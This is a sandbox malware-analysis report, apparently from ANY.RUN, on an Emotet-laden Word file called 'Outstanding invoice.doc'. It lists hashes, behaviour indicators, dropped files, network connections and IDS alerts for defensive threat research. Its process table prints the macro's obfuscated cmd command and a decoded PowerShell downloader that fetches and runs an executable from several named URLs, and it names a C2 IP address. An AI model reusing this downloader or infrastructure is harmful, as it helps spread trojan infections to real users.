analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Outstanding invoice.doc

Full analysis: https://app.any.run/tasks/d2abe020-3774-40d8-92d1-478f693bbea8
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: December 06, 2018, 17:51:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 16:36:00 2018, Last Saved Time/Date: Thu Dec 6 16:36:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
MD5:

9CFE90E71789C4471CC7AABA1F464172

SHA1:

B57ED2FA9A15CC0E11F4F52043803D079E274A2D

SHA256:

79581B2546412CE896E213275E07E854FBADEEFFAF879CAB5D3683B40F0BA341

SSDEEP:

1536:N81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9VhukWpQ0B3PZ0qoiIc:N8GhDS0o9zTGOZD6EbzCdvh/0L0qZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 946.exe (PID: 3036)
      • 946.exe (PID: 3908)
      • archivesymbol.exe (PID: 3780)
      • archivesymbol.exe (PID: 2364)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 4028)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3348)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3376)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3348)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 4028)

    • Connects to CnC server

      • archivesymbol.exe (PID: 2364)

    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 2364)

    • EMOTET was detected

      • archivesymbol.exe (PID: 2364)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4028)
      • 946.exe (PID: 3908)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3376)
      • cmd.exe (PID: 3132)
      • cmd.exe (PID: 2548)

    • Application launched itself

      • cmd.exe (PID: 3132)

    • Starts itself from another location

      • 946.exe (PID: 3908)

    • Creates files in the user directory

      • powershell.exe (PID: 4028)

    • Connects to unusual port

      • archivesymbol.exe (PID: 2364)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3348)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3348)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 21
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 19
Words: 3
Pages: 1
ModifyDate: 2018:12:06 16:36:00
CreateDate: 2018:12:06 16:36:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
11
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 946.exe no specs 946.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3348"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Outstanding invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2548c:\CidOFIsHOvnzA\wWFwFduFCN\DQTSlcf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set xv=MsHiWLUQEdwaJGRw-po4tulK=:/' 8In9+5Vm)TNBxDf@jy$kYS{,;}grv0hAPX6C.bFcez(\q&&for %C in (47;64;68;21;24;27;62;22;73;27;53;47;62;45;70;24;31;69;15;16;18;66;45;69;68;20;28;39;69;20;65;4;69;66;64;22;3;69;31;20;53;47;60;23;1;24;27;59;20;20;17;25;26;26;66;69;20;59;56;18;15;65;68;18;65;21;48;26;22;0;61;8;44;59;20;20;17;25;26;26;36;18;43;11;66;22;69;1;65;68;18;36;26;26;38;44;59;20;20;17;25;26;26;36;69;22;22;43;18;56;1;65;68;18;36;26;31;14;59;36;40;17;15;5;44;59;20;20;17;25;26;26;22;3;57;3;31;55;36;69;1;1;11;55;69;68;59;21;56;68;59;65;68;18;36;26;30;49;32;55;62;34;36;38;44;59;20;20;17;1;25;26;26;68;21;1;20;18;36;69;9;3;11;65;69;1;26;3;27;65;50;17;22;3;20;71;27;44;27;37;53;47;3;60;43;24;27;13;6;70;27;53;47;49;15;61;28;24;28;27;32;19;63;27;53;47;45;50;13;24;27;17;15;67;27;53;47;59;57;40;24;47;69;31;57;25;20;69;36;17;33;27;72;27;33;47;49;15;61;33;27;65;69;41;69;27;53;43;18;56;69;11;68;59;71;47;13;9;48;28;3;31;28;47;60;23;1;37;51;20;56;46;51;47;62;45;70;65;42;18;15;31;22;18;11;9;67;3;22;69;71;47;13;9;48;52;28;47;59;57;40;37;53;47;0;49;61;24;27;60;35;3;27;53;30;43;28;71;71;13;69;20;16;30;20;69;36;28;47;59;57;40;37;65;22;69;31;55;20;59;28;16;55;69;28;29;58;58;58;58;37;28;51;30;31;57;18;48;69;16;30;20;69;36;28;47;59;57;40;53;47;14;38;57;24;27;60;42;61;27;53;66;56;69;11;48;53;54;54;68;11;20;68;59;51;54;54;47;22;68;67;24;27;62;73;39;27;53;74)do set 953n=!953n!!xv:~%C,1!&&if %C gtr 73 echo !953n:~-428!|FOR /F "delims=7OCsi. tokens=5" %W IN ('assoc.psc1')DO %W -" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3132CmD /V/C"set xv=MsHiWLUQEdwaJGRw-po4tulK=:/' 8In9+5Vm)TNBxDf@jy$kYS{,;}grv0hAPX6C.bFcez(\q&&for %C in (47;64;68;21;24;27;62;22;73;27;53;47;62;45;70;24;31;69;15;16;18;66;45;69;68;20;28;39;69;20;65;4;69;66;64;22;3;69;31;20;53;47;60;23;1;24;27;59;20;20;17;25;26;26;66;69;20;59;56;18;15;65;68;18;65;21;48;26;22;0;61;8;44;59;20;20;17;25;26;26;36;18;43;11;66;22;69;1;65;68;18;36;26;26;38;44;59;20;20;17;25;26;26;36;69;22;22;43;18;56;1;65;68;18;36;26;31;14;59;36;40;17;15;5;44;59;20;20;17;25;26;26;22;3;57;3;31;55;36;69;1;1;11;55;69;68;59;21;56;68;59;65;68;18;36;26;30;49;32;55;62;34;36;38;44;59;20;20;17;1;25;26;26;68;21;1;20;18;36;69;9;3;11;65;69;1;26;3;27;65;50;17;22;3;20;71;27;44;27;37;53;47;3;60;43;24;27;13;6;70;27;53;47;49;15;61;28;24;28;27;32;19;63;27;53;47;45;50;13;24;27;17;15;67;27;53;47;59;57;40;24;47;69;31;57;25;20;69;36;17;33;27;72;27;33;47;49;15;61;33;27;65;69;41;69;27;53;43;18;56;69;11;68;59;71;47;13;9;48;28;3;31;28;47;60;23;1;37;51;20;56;46;51;47;62;45;70;65;42;18;15;31;22;18;11;9;67;3;22;69;71;47;13;9;48;52;28;47;59;57;40;37;53;47;0;49;61;24;27;60;35;3;27;53;30;43;28;71;71;13;69;20;16;30;20;69;36;28;47;59;57;40;37;65;22;69;31;55;20;59;28;16;55;69;28;29;58;58;58;58;37;28;51;30;31;57;18;48;69;16;30;20;69;36;28;47;59;57;40;53;47;14;38;57;24;27;60;42;61;27;53;66;56;69;11;48;53;54;54;68;11;20;68;59;51;54;54;47;22;68;67;24;27;62;73;39;27;53;74)do set 953n=!953n!!xv:~%C,1!&&if %C gtr 73 echo !953n:~-428!|FOR /F "delims=7OCsi. tokens=5" %W IN ('assoc.psc1')DO %W -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3276C:\Windows\system32\cmd.exe /S /D /c" echo $Ccu='Xlq';$Xjz=new-object Net.WebClient;$AKs='http://bethrow.co.uk/lMPE@http://mofables.com//T@http://mellfors.com/nRhmBpwL@http://livingmessagechurch.com/IY9gX5mT@https://customedia.es/i'.Split('@');$iAf='GUz';$YwP = '946';$jSG='pwF';$hvB=$env:temp+'\'+$YwP+'.exe';foreach($Gdk in $AKs){try{$Xjz.DownloadFile($Gdk, $hvB);$MYP='AVi';If ((Get-Item $hvB).length -ge 80000) {Invoke-Item $hvB;$RTv='ADP';break;}}catch{}}$lcF='XqN';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3376C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=7OCsi. tokens=5" %W IN ('assoc.psc1') DO %W -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3304C:\Windows\system32\cmd.exe /c assoc.psc1C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4028PowerShell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3036"C:\Users\admin\AppData\Local\Temp\946.exe" C:\Users\admin\AppData\Local\Temp\946.exepowershell.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Specialer DLL
Exit code:
0
Version:
6.1.7600.1
3908"C:\Users\admin\AppData\Local\Temp\946.exe"C:\Users\admin\AppData\Local\Temp\946.exe
946.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Specialer DLL
Exit code:
0
Version:
6.1.7600.1
3780"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe946.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Specialer DLL
Exit code:
0
Version:
6.1.7600.1
Total events
1 695
Read events
1 280
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3348WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR87D3.tmp.cvr
MD5:
SHA256:
4028powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3IGDZ5FPNEFR8AT02AU0.temp
MD5:
SHA256:
3348WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$tstanding invoice.docpgc
MD5:1AEA9B2A19567FADABD6A0B4DF9443D4
SHA256:C7E2BDDCB36DBC13011055A9BDD1DF3E38C9879C3E2CF56470BBBA75F26C9A13
4028powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
4028powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199b5b.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3908946.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:465C7FB95C45008DDC6B940624745430
SHA256:21355753A277813CF58A348E389FA4FEEBCA3F819BA7C78A8AB679A4F63D1953
4028powershell.exeC:\Users\admin\AppData\Local\Temp\946.exeexecutable
MD5:465C7FB95C45008DDC6B940624745430
SHA256:21355753A277813CF58A348E389FA4FEEBCA3F819BA7C78A8AB679A4F63D1953
3348WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6E28B672E33ED44FA2233E4B0EA4D984
SHA256:ECF9C6BE22E4A542EBECD6F2A9B2ABCD77BA994D3F8910570A44D4737F95D6E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4028
powershell.exe
GET
301
91.186.0.8:80
http://bethrow.co.uk/lMPE
GB
html
234 b
malicious
2364
archivesymbol.exe
GET
200
189.223.176.239:7080
http://189.223.176.239:7080/
MX
binary
132 b
malicious
4028
powershell.exe
GET
200
91.186.0.8:80
http://bethrow.co.uk/lMPE/
GB
executable
120 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4028
powershell.exe
91.186.0.8:80
bethrow.co.uk
Simply Transit Ltd
GB
malicious
2364
archivesymbol.exe
189.223.176.239:7080
Uninet S.A. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
bethrow.co.uk
  • 91.186.0.8
malicious

Threats

PID
Process
Class
Message
4028
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
4028
powershell.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
4028
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4028
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4028
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2364
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2364
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Outstanding invoice.doc